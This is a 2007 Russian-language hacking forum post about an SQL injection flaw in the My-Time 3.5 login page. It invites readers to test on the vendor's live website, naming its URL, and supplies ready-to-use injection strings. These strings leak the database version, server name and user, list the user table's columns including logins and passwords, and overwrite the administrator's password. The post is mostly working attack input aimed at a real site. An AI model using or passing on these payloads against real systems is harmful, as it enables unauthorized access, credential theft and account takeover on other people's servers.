27.11.2007, 17:59
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
SQL-инъекция в My-Time<=3.5
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "login" и "password" сценарием login.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Тестим на сайте производителя! www.irola.com
_http://www.irola.com/mytime35/login.asp
1. Обход авторизации:
В поля ввода логин и пасс:
2. Смотрим системные переменные:
Код:
1' or 1=convert(int,@@version)--
1' or 1=convert(int,@@servername)--
1' or 1=convert(int,db_name())--
1' or 1=convert(int,user_name())--
1' or 1=convert(int,system_user)--
3. Таблицы:
Код:
UserInfo.UserID
UserInfo.Login
UserInfo.Password
UserInfo.UserNumber
UserInfo.FirstName
UserInfo.LastName
UserInfo.TeamID
UserInfo.Address
UserInfo.City
UserInfo.ZipCode
UserInfo.CountryID
UserInfo.Phone
4. Меняем админский пароль:
Код:
-1' UPDATE UserInfo set Password= '1234' Where(UserID= '1');--
aria-security.net
|
|
|